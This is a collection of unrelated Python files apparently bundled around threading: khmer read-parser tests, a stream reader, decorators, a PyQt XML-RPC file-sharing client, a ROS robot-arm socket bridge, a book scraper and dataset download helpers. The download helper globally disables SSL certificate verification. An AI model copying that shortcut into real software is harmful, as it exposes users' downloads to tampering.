# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Contact: khmer-project@idyll.org
# pylint: disable=missing-docstring,invalid-name
# Tests for the ReadParser and Read classes.
from __future__ import print_function
from __future__ import absolute_import
from khmer import ReadParser
from . import khmer_tst_utils as utils
import pytest
from functools import reduce # pylint: disable=redefined-builtin
def test_read_properties():
# Note: Using a data file with only one read.
rparser = ReadParser(utils.get_test_data("single-read.fq"))
# Check the properties of all one reads in data set.
for read in rparser:
assert read.name == "895:1:1:1246:14654 1:N:0:NNNNN"
assert read.sequence == "CAGGCGCCCACCACCGTGCCCTCCAACCTGATGGT"
assert read.annotations == ""
assert read.quality == """][aaX__aa[`ZUZ[NONNFNNNNNO_____^RQ_"""
def test_with_default_arguments():
read_names = []
# Note: Using a data file where read names are just integers on [0,99).
rparser = ReadParser(utils.get_test_data("random-20-a.fa"))
for read in rparser:
read_names.append(int(read.name))
# "Derandomize".
read_names.sort()
# Each read number should match the corresponding name.
for m, n in enumerate(read_names):
assert m == n
def test_num_reads():
"""Test ReadParser.num_reads"""
reads_count = 0
rparser = ReadParser(utils.get_test_data("100-reads.fq.gz"))
for _ in rparser:
reads_count += 1
assert reads_count == 100
assert rparser.num_reads == 100
@pytest.mark.multithread
def test_num_reads_threads():
"""Test threadsaftey of ReadParser's read counting"""
import threading
def count_reads(rparser):
for _ in rparser:
pass
n_threads = 4
threads = []
rparser = ReadParser(utils.get_test_data("100-reads.fq.gz"))
for _ in range(n_threads):
thr = threading.Thread(target=count_reads, args=[rparser, ])
threads.append(thr)
thr.start()
for thr in threads:
thr.join()
assert rparser.num_reads == 100
def test_num_reads_truncated():
n_reads = 0
rparser = ReadParser(utils.get_test_data("truncated.fq"))
try:
for _ in rparser:
n_reads += 1
except ValueError as err:
assert "Sequence is empty" in str(err), str(err)
assert rparser.num_reads == 1, "%d valid reads in file, got %d" % (
n_reads, rparser.num_reads)
def test_gzip_decompression():
reads_count = 0
rparser = ReadParser(utils.get_test_data("100-reads.fq.gz"))
for _ in rparser:
reads_count += 1
assert 100 == reads_count
def test_gzip_decompression_truncated():
rparser = ReadParser(utils.get_test_data("100-reads.fq.truncated.gz"))
try:
for _ in rparser:
pass
assert 0, "this should fail"
except OSError as err:
print(str(err))
def test_gzip_decompression_truncated_pairiter():
rparser = ReadParser(utils.get_test_data("100-reads.fq.truncated.gz"))
try:
for _ in rparser.iter_read_pairs():
pass
assert 0, "this should fail"
except OSError as err:
print(str(err))
except ValueError as err:
print(str(err))
def test_bzip2_decompression():
reads_count = 0
rparser = ReadParser(utils.get_test_data("100-reads.fq.bz2"))
for _ in rparser:
reads_count += 1
assert 100 == reads_count
def test_bzip2_decompression_truncated():
rparser = ReadParser(utils.get_test_data("100-reads.fq.truncated.bz2"))
try:
for _ in rparser:
pass
assert 0, "this should fail"
except OSError as err:
print(str(err))
except ValueError as err:
print(str(err))
def test_bzip2_decompression_truncated_pairiter():
rparser = ReadParser(utils.get_test_data("100-reads.fq.truncated.bz2"))
try:
for _ in rparser.iter_read_pairs():
pass
assert 0, "this should fail"
except OSError as err:
print(str(err))
except ValueError as err:
print(str(err))
def test_badbzip2():
try:
rparser = ReadParser(utils.get_test_data("test-empty.fa.bz2"))
for _ in rparser:
pass
assert 0, "this should fail"
except OSError as err:
print(str(err))
except ValueError as err:
print(str(err))
@pytest.mark.multithread
def test_with_multiple_threads(testfile="test-reads.fq.bz2"):
import operator
import threading
reads_count_1thr = 0
rparser = ReadParser(utils.get_test_data(testfile))
for _ in rparser:
reads_count_1thr += 1
def count_reads(rparser, counters, tnum):
counters[tnum] = reduce(operator.add, (1 for read in rparser))
N_THREADS = 4
threads = []
reads_counts_per_thread = [0] * N_THREADS
rparser = ReadParser(utils.get_test_data(testfile))
for tnum in range(N_THREADS):
t = \
threading.Thread(
target=count_reads,
args=[rparser, reads_counts_per_thread, tnum]
)
threads.append(t)
t.start()
for t in threads:
t.join()
assert reads_count_1thr == sum(reads_counts_per_thread), \
reads_counts_per_thread
@pytest.mark.multithread
def test_with_multiple_threads_big():
test_with_multiple_threads(testfile="test-large.fa")
@pytest.mark.multithread
def test_old_illumina_pair_mating():
import threading
rparser = ReadParser(utils.get_test_data("test-reads.fa"))
def thread_1_runtime(rparser):
for _ in rparser:
pass
def thread_2_runtime(rparser):
for readnum, _ in enumerate(rparser):
if 0 == readnum:
pass
t1 = threading.Thread(target=thread_1_runtime, args=[rparser])
t2 = threading.Thread(target=thread_2_runtime, args=[rparser])
t1.start()
t2.start()
t1.join()
t2.join()
@pytest.mark.multithread
def test_casava_1_8_pair_mating():
import threading
# Note: This file, when used in conjunction with a 64 KiB per-thread
# prefetch buffer, tests the paired read mating logic with the
# Casava >= 1.8 read name format.
rparser = ReadParser(utils.get_test_data("test-reads.fq.bz2"))
def thread_1_runtime(rparser):
for _ in rparser:
pass
def thread_2_runtime(rparser):
for readnum, _ in enumerate(rparser):
if 0 == readnum:
pass
# assert "895:1:1:1761:13189 2:N:0:NNNNN" == read.name, read.name
t1 = threading.Thread(target=thread_1_runtime, args=[rparser])
t2 = threading.Thread(target=thread_2_runtime, args=[rparser])
t1.start()
t2.start()
t1.join()
t2.join()
def test_read_truncated():
rparser = ReadParser(utils.get_test_data("truncated.fq"))
try:
for _ in rparser:
pass
assert 0, "No exception raised on a truncated file"
except ValueError as err:
assert "Sequence is empty" in str(err), str(err)
def test_iterator_identities():
rparser = \
ReadParser(utils.get_test_data("test-abund-read-paired.fa"))
assert rparser is rparser.__iter__()
assert rparser is rparser.iter_reads()
@pytest.mark.known_failing
def test_read_pair_iterator_in_error_mode():
assert 0
rparser = \
ReadParser(utils.get_test_data("test-abund-read-paired.fa"))
# If walks like an iterator and quacks like an iterator...
rpi = rparser.iter_read_pairs()
assert "__iter__" in dir(rpi)
assert "next" in dir(rpi)
# Are the alleged pairs actually pairs?
read_pairs_1 = []
for read_1, read_2 in rpi:
read_pairs_1.append([read_1, read_2])
assert read_1.name[: 19] == read_2.name[: 19]
# Reload parser.
# Note: No 'rewind' or 'reset' capability at the time of this writing.
rparser = \
ReadParser(utils.get_test_data("test-abund-read-paired.fa"))
# Ensure that error mode is the default mode.
read_pairs_2 = []
for read_1, read_2 \
in rparser.iter_read_pairs(ReadParser.PAIR_MODE_ERROR_ON_UNPAIRED):
read_pairs_2.append([read_1, read_2])
matches = [(rp1, rp2) for rp1, rp2 in zip(read_pairs_1, read_pairs_2)
if rp1[0].name == rp2[0].name]
assert all(matches) # Assert ALL the matches. :-]
@pytest.mark.linux
def test_read_pair_iterator_in_error_mode_xfail():
rparser = \
ReadParser(utils.get_test_data("test-abund-read-impaired.fa"))
failed = True
try:
for _ in rparser.iter_read_pairs():
pass
failed = False
except ValueError as exc:
assert "Invalid read pair" in str(exc), str(exc)
assert failed
def test_read_pair_iterator_in_error_mode_xfail_osxsafe():
rparser = \
ReadParser(utils.get_test_data("test-abund-read-impaired.fa"))
failed = True
try:
for _ in rparser.iter_read_pairs():
pass
failed = False
except ValueError:
pass
assert failed
@pytest.mark.known_failing
def test_read_pair_iterator_in_ignore_mode():
assert 0
rparser = \
ReadParser(utils.get_test_data("test-abund-read-impaired.fa"))
read_pairs = []
for read_1, read_2 \
in rparser.iter_read_pairs(ReadParser.PAIR_MODE_IGNORE_UNPAIRED):
read_pairs.append([read_1, read_2])
assert read_1.name[: 19] == read_2.name[: 19]
assert 2 == len(read_pairs)
def test_constructor():
# Note: Using a data file with only one read.
try:
ReadParser(utils.get_test_data("single-read.fq"), "a")
assert 0, ("ReadParser's constructor shouldn't accept a character for "
"the number of threads")
except TypeError as err:
print(str(err))
try:
ReadParser("non-existent-file-name")
assert 0, "ReadParser shouldn't accept a non-existant file name"
except ValueError as err:
print(str(err))
except OSError as err:
print(str(err))
def test_iternext():
try:
rparser = ReadParser(utils.get_test_data("fakelump.fa.stoptags.txt"))
read_pairs = []
for read_1, read_2 in rparser.iter_read_pairs():
read_pairs.append(read_1, read_2)
assert 0, "Shouldn't be able to iterate over non FASTA file"
except OSError as err:
print(str(err))
except ValueError as err:
print(str(err))
# vim: set filetype=python tabstop=4 softtabstop=4 shiftwidth=4 expandtab:
# vim: set textwidth=79:
|
nbsp.py
|
# _*_ coding:UTF-8 _*_
import time
from threading import Thread, Event
from six.moves import queue
from .logger import get_logger
LOGGING = get_logger(__name__)
class NonBlockingStreamReader:
def __init__(self, stream, raise_EOF=False, print_output=True, print_new_line=True, name=None):
'''
stream: the stream to read from.
Usually a process' stdout or stderr.
raise_EOF: if True, raise an UnexpectedEndOfStream
when stream is EOF before kill
print_output: if True, print when readline
'''
self._s = stream
self._q = queue.Queue()
self._lastline = None
self.name = name or id(self)
def _populateQueue(stream, queue, kill_event):
'''
Collect lines from 'stream' and put them in 'quque'.
'''
while not kill_event.is_set():
line = stream.readline()
if line:
queue.put(line)
if print_output:
# print only new line
if print_new_line and line == self._lastline:
continue
self._lastline = line
LOGGING.debug("[%s]%s" % (self.name, repr(line.strip())))
elif kill_event.is_set():
break
elif raise_EOF:
raise UnexpectedEndOfStream
else:
# print("EndOfStream: %s" % self.name)
break
self._kill_event = Event()
self._t = Thread(target=_populateQueue, args=(self._s, self._q, self._kill_event), name="nbsp_%s"%self.name)
self._t.daemon = True
self._t.start() # start collecting lines from the stream
def readline(self, timeout=None):
try:
return self._q.get(block=timeout is not None, timeout=timeout)
except queue.Empty:
return None
def read(self, timeout=0):
time.sleep(timeout)
lines = []
while True:
line = self.readline()
if line is None:
break
lines.append(line)
return b"".join(lines)
def kill(self):
self._kill_event.set()
class UnexpectedEndOfStream(Exception):
pass
|
Decoradores.py
|
from time import time
import threading
from multiprocessing import Process
from apps.Util_apps.LogProject import logging
def count_elapsed_time(f):
"""
Decorator.
Execute the function and calculate the elapsed time.
Print the result to the standard output.
"""
def wrapper(*args, **kwargs):
# Start counting.
start_time = time()
# Take the original function's return value.
ret = f(*args, **kwargs)
# Calculate the elapsed time.
elapsed_time = time() - start_time
print("Elapsed time: %0.10f seconds." % elapsed_time)
return ret
return wrapper
def execute_in_thread(name=None, daemon=None, ponerDelay=None):
def _execute_in_thread(f):
"""
Decorator.
Execute the function in thread.
"""
def wrapper(*args, **kwargs):
thread_f = threading.Thread(target=f, args=args, kwargs=kwargs)
if daemon is not None:
thread_f.setDaemon(True)
if name is not None:
thread_f.setName(name)
logging.info("Se ha lanzado un nuevo hilo usando el decorador con nombre: '" + name + "'.")
else:
logging.info("Se ha lanzado un nuevo hilo usando el decorador.")
thread_f.start()
if ponerDelay is not None:
thread_f.join()
# logging.info("Hilo terminado")
return thread_f
return wrapper
return _execute_in_thread
def execute_in_thread_timer(seconds):
def _execute_in_thread_timer(f):
"""
Decorator.
Execute the function in thread timer, with out parameters.
"""
def wrapper(*args, **kwargs):
thread_f = threading.Timer(seconds, f)
logging.info("Se ha lanzado un nuevo hilo con timer usando el decorador.")
thread_f.start()
return thread_f
return wrapper
return _execute_in_thread_timer
def execute_in_process(f):
"""
Decorator.
Execute the function in thread.
"""
def wrapper(*args, **kwargs):
logging.info("Se ha lanzado un nuevo proceso")
process_f = Process(target=f, args=args, kwargs=kwargs)
process_f.start()
return process_f
return wrapper
|
clientgui.py
|
from PyQt5.QtWidgets import QLabel ,QWidget, QMainWindow,QApplication,QMessageBox
from PyQt5.QtCore import QStringListModel
from PyQt5.QtWidgets import QFileDialog,QListView #必须导入,否则会出错 -1073740791 (0xC0000409)
from UI import Ui_MainWindow # 【UI】指的是UI文件的文件名
from os import path,listdir
from server import Node, UNHANDLED # 向RPC Server调用方法,并接收方法的返回数据;
from client import random_string
from threading import Thread
from time import sleep
from xmlrpc.client import ServerProxy, Fault
import sys
HEAD_START = 0.1 # Seconds
SECRET_LENGTH = 100
class ListableNode(Node): #从Node派生出子类,从而新增一个方法
def list(self):
return listdir(self.dirname)
class PyQtLogic(QMainWindow, Ui_MainWindow): #构造函数,QMainWindows来自于 from
def __init__(self):
super(PyQtLogic,self).__init__() # #首先找到子类(my转成QWidget的对象,然后被转化的self调用自己的init函数
self.setupUi(self) # #直接继承界面类,调用类的setupUi方法
def aboutthis(self):
QMessageBox.about(self, '关于本程序', '基于XML-RPC的p2p共享程序')
def open(self): #浏览 槽函数
dirname=QFileDialog.getExistingDirectory(self,'打开文件夹','C:\\Users\\wdther\\Desktop\\XML-RPC') #需要用到转义字符 \ 因此要用 \\双斜杠
file1 = dirname + '\\urlfile.txt'
self.dir.setText(file1)
url = self.webaddress.text()
self.tips.setText("网址已获取" + url)
urlfile=file1
self.node_setup(url, dirname, urlfile)
self.update_list() #疑惑为什么调用这个函数
def fetch(self):
query = self.filename.text()
print(query)
try:
self.server.fetch(query, self.secret)
self.update_list()
except Fault as f:
if f.faultCode != UNHANDLED: raise
print("Couldn't find the file", query)
def node_setup(self, url, dirname, urlfile):
self.secret = random_string(SECRET_LENGTH)
n = ListableNode(url, dirname, self.secret)
#n = Node(url, dirname, self.secret)
t = Thread(target=n._start)
t.setDaemon(1)
t.start()
# 让服务器先行一步:
sleep(HEAD_START)
self.server = ServerProxy(url)
urlfile = path.join(dirname, urlfile)
for line in open(urlfile):
line = line.strip()
self.server.hello(line)
self.tips.setText("已经连接服务器,下一步获取文件" )
def update_list(self):
slm=QStringListModel()
self.qlist=self.server.list() #数据类型为列表,而非字符串
slm.setStringList(self.qlist)#
self.filelistView.setModel(slm)
if __name__ == "__main__":
app = QApplication(sys.argv) #pyqt窗口必须在QApplication方法中使用
window = PyQtLogic() # 实例化类
window.show() #windows调用show方法
sys.exit(app.exec_()) # #消息结束的时候,结束进程,并返回0,接着调用sys.exit(0)退出程序
|
HiwinRA605_socket_ros_20190614135358.py
|
#!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
##------------class pos-------
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(req): ##接收策略端傳送位姿資料
global client_response
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ##接收策略端傳送手臂模式資料
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ##接收策略端傳送手臂模式資料
socket_cmd.Speedmode = int('%s'%req.Speedmode)
return(1)
def socket_server(): ##創建Server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
start_input=int(input('開始傳輸請按1,離開請按3 : ')) #輸入開始指令
#start_input = 1
if start_input==1:
while 1:
##---------------socket 傳輸手臂命令-----------------
#-------選擇模式--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
s.send(data.encode('utf-8'))#socket傳送for python to translate str
feedback_str = s.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '70':# F 手臂為Ready狀態準備接收下一個運動指令
feedback = 0
socket_client_arm_state(feedback)
print("isbusy false")
if str(feedback_str[2]) == '84':# T 手臂為忙碌狀態無法執行下一個運動指令
feedback = 1
socket_client_arm_state(feedback)
print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
feedback = 6
socket_client_arm_state(feedback)
print("shutdown")
#Arm_feedback = TCP.Is_busy(feedback)
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
socket_server()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line
|
book_scraper_multithreading.py
|
from bs4 import BeautifulSoup
from urllib.request import urlopen
import threading
from multiprocessing.pool import ThreadPool
import queue
import csv
# Get the next page url from the current page url
def get_next_page_url(url):
page = urlopen(url)
soup_page = BeautifulSoup(page, 'lxml')
page.close()
# Get current page and next page tag
current_page_tag = soup_page.find(class_="current")
next_page_tag = current_page_tag.find_next_sibling()
# Check if the current page is the last one
if next_page_tag is None:
next_page_url = None
else:
next_page_url = next_page_tag['href']
return next_page_url
# Get the book detail urls by page url
def get_book_detail_urls(url):
page = urlopen(url)
soup = BeautifulSoup(page, 'lxml')
page.close()
urls = []
book_header_tags = soup.find_all(class_="entry-title")
for book_header_tag in book_header_tags:
urls.append(book_header_tag.a['href'])
return urls
# Get the book detail info by book detail url
def get_book_detail_info(url, q):
# print(url)
page = urlopen(url)
book_detail_soup = BeautifulSoup(page, 'lxml')
page.close()
title_tag = book_detail_soup.find(class_="single-title")
title = title_tag.string
isbn_key_tag = book_detail_soup.find(text="Isbn:").parent
isbn_tag = isbn_key_tag.find_next_sibling()
isbn = isbn_tag.string.strip() # Remove the whitespace with the strip() method
# book_info = { 'title': title, 'isbn': isbn }
book_info = [title, isbn]
q.put(book_info)
def run():
url = "http://www.allitebooks.com/programming/net/page/1/"
book_info_list = []
def scapping_by_page(book_detail_urls):
qs = []
for book_detail_url in book_detail_urls:
# Get the return value from the thread
q = queue.Queue()
thr = threading.Thread(target=get_book_detail_info, args=(book_detail_url, q))
thr.start()
qs.append(q)
for q in qs:
book_info = q.get()
print(book_info)
book_info_list.append(book_info)
def scapping(page_url):
print(page_url)
book_detail_urls = get_book_detail_urls(page_url)
scapping_by_page(book_detail_urls)
next_page_url = get_next_page_url(page_url)
if next_page_url is not None:
scapping(next_page_url)
else:
return
scapping(url)
print(len(book_info_list))
save_to_csv(book_info_list)
def save_to_csv(list):
with open('books.csv', 'w', newline='') as fp:
a = csv.writer(fp, delimiter=',')
a.writerow(['title','isbn'])
a.writerows(list)
run()
|
dataset_utils.py
|
#!/usr/bin/env python
# coding=utf8
"""Contains utilities for downloading and converting datasets."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import gzip
import os
import shutil
import ssl
import sys
import tarfile
import threading
import zipfile
from datetime import datetime
import numpy as np
import tensorflow as tf
from six.moves import urllib
def log(msg, *args):
msg = '[{}] ' + msg
print(msg.format(datetime.now(), *args))
sys.stdout.flush()
def str2bool(v):
y = ['yes', 'true', 't', 'y', '1']
n = ['no', 'false', 'f', 'n', '0']
if v.lower() in y:
return True
elif v.lower() in n:
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def get_image_file_format(filename):
image_name = filename.rsplit('.', 1)
if len(image_name) <= 1:
return 'jpg' # default format
image_format = image_name[-1].lower()
if image_format in ['jpg', 'jpeg']:
return 'jpg'
elif image_format in ['bmp', 'png', 'gif']:
return image_format
return ""
def download_file(url, data_dir, filename):
"""
URL로부터 데이터를 다운로드한다.
:param url: 저장할 파일을 가리키는 URL.
:param data_dir: 파일을 저장할 디렉토리 경로.
:param filename: 저장할 파일 이름.
:return: 저장된 파일의 경로 디렉토리.
"""
if not os.path.exists(data_dir):
os.makedirs(data_dir)
filepath = os.path.join(data_dir, filename)
def _progress(count, block_size, total_size):
if total_size > 0:
sys.stdout.write('\r>> Downloading %s %.1f%%' % (filename, float(count * block_size) / float(total_size) * 100.0))
else:
sys.stdout.write('\r>> Downloading %s %s' % (filename, '.' * (count % 20)))
sys.stdout.flush()
# This is the way to allow unverified SSL
ssl._create_default_https_context = ssl._create_unverified_context
filepath, _ = urllib.request.urlretrieve(url, filepath, _progress)
statinfo = os.stat(filepath)
print()
log('Successfully downloaded', filename, statinfo.st_size, 'bytes.')
return filepath
def download_and_uncompress_tarball(tarball_url, data_dir, filename):
"""
tar 형식으로 저장된 URL 파일을 다운받아 압축을 풀어 저장한다.
:param tarball_url: tarball 파일 URL.
:param data_dir: The directory where the output files are stored.
:param filename: String, path to a output file.
:return: The directory where the outputfiles are stored.
"""
filepath = download_file(tarball_url, data_dir, filename)
if filepath.endswith('tar'):
tarfile.open(filepath, 'r:').extractall(data_dir)
elif filepath.endswith('tar.gz'):
tarfile.open(filepath, 'r:gz').extractall(data_dir)
elif filepath.endswith('tgz'):
tarfile.open(filepath, 'r:gz').extractall(data_dir)
return data_dir
def download_and_uncompress_zip(zip_url, data_dir, zipped_filename):
"""
zip 형식으로 저장된 URL 파일을 다운받아 압축을 풀어 저장한다.
:param zip_url: The URL of zip file.
:param data_dir: The directory where the output files are stored.
:param zipped_filename: String, path to a output file.
:return: Uncompredded file path.
"""
zip_suffix = '.zip'
zip_len = len(zip_suffix)
assert len(zipped_filename) >= zip_len and zipped_filename[-zip_len:] == zip_suffix
zipped_filepath = download_file(zip_url, data_dir, zipped_filename)
zip_ref = zipfile.ZipFile(zipped_filepath, 'r')
zip_ref.extractall(data_dir)
zip_ref.close()
return zipped_filepath
def download_and_uncompress_gzip(gzip_url, data_dir, zipped_filename):
"""
Downloads the `gzip_url` and uncompresses it locally.
:param gzip_url: The URL of gzip file.
:param data_dir: The directory where the output files are stored.
:param zipped_filename: String, path to a output file.
:return: Uncompredded file path.
"""
zip_suffix = '.gz'
zip_len = len(zip_suffix)
assert len(zipped_filename) >= zip_len and zipped_filename[-zip_len:] == zip_suffix
zipped_filepath = download_file(gzip_url, data_dir, zipped_filename)
filepath = zipped_filepath[:-zip_len]
with gzip.open(zipped_filepath, 'rb') as f_in:
# gzip only suppport single file.
with tf.gfile.Open(filepath, 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
return filepath
def thread_execute(num_threads, fn):
"""
Thread 단위로 fn 을 병렬 수행한다.
:param num_threads: thread 갯수
:param target_fn: thread 가 수행할 함수로 첫번째 인자에 thread index를 넘긴다.
"""
assert num_threads > 0
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
threads = []
for idx in range(num_threads):
t = threading.Thread(target=fn, args=(idx,))
t.start()
threads.append(t)
coord.join(threads) # Wait for all the threads to terminate.
def split(contents, num_split, start_index=0):
"""
contents 를 num_split 값만큼 분할하여 리스트로 반환.
:param contents: 분할하고자 하는 데이터 리스트
:param num_split: 분할 갯수
:param start_index: contents 시작 인덱스 번호로 default 값으로 0을 사용
:return: split 갯수 크기의 더블 리스트. [[...],[...],...]
"""
rs = np.linspace(start_index, len(contents), num_split + 1).astype(np.int)
result = [contents[rs[i]:rs[i + 1]] for i in range(len(rs) - 1)]
return result
def split_range(total, num_split, start_index=0):
"""
정수 범위의 값을 num_split 값만큼 분할하여 해당 start, end 인덱스를 반환.
:param total: 분할하고자 하는 max 값
:param num_split: 분할 갯수
:param start_index: contents 시작 인덱스 번호로 default 값으로 0을 사용
:return: split 갯수 크기의 리스트로 start/end 인덱스 튜플을 원소로 가짐. [(s,e),(s,e),...]
"""
rs = np.linspace(start_index, total, num_split + 1).astype(np.int)
result = [(rs[i], rs[i + 1]) for i in range(len(rs) - 1)]
return result
def make_shard_offsets(total, num_threads, num_shards):
"""
Thread 와 thread 내 shard 에서 사용할 인덱스 범위를 생성
:param total: 분할하고자 하는 max 값
:param num_threads: thread 갯수
:param num_shards: 총 shard 수로 (num_threads * num_shards_per_thread)와 같다.
:return: [[(s,e),(s,e)...],[()()...],...] 와 같은 형태의 더블 리스트.
"""
assert total > 0
assert num_threads > 0
assert num_shards > 0
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
thread_range = split_range(total, num_threads)
offsets = []
for start, end in thread_range:
offsets.append(split_range(end, num_shards_per_batch, start_index=start))
return offsets
def make_shard_filenames(name, total, num_threads, num_shards):
assert total > 0
assert num_threads > 0
assert num_shards > 0
offsets = make_shard_offsets(total, num_threads, num_shards)
filenames = []
shard_idx = 0
for thread_offsets in offsets:
shard_filenames = []
for _ in thread_offsets:
filename = '%s-%.5d-of-%.5d' % (name, shard_idx, num_shards)
shard_idx += 1
shard_filenames.append(filename)
filenames.append(shard_filenames)
return filenames
def make_label_id_to_name(data_dir, start_index=0):
"""
레이블 이름이 디렉토리인 경우 이를 읽어 학습에 사용할 label id 로 매핑하는 함수.
아래와 같은 형식의 데이터를 {0:labelA, 1:labelB} 와 같은 dict 객체로 변환한다.
data_dir/labelA/xxx.jpg
data_dir/labelB/yyy.jpg
:param data_dir: 레이블 디렉토리가 포함된 상위 디렉토리 이름.
:return: name[id] 형식의 dict 객체.
"""
id_to_name = {}
label_index = 0 + start_index
# os.listdir()은 순서를 보장하지 않으므로 반드시 sort하여 사용.
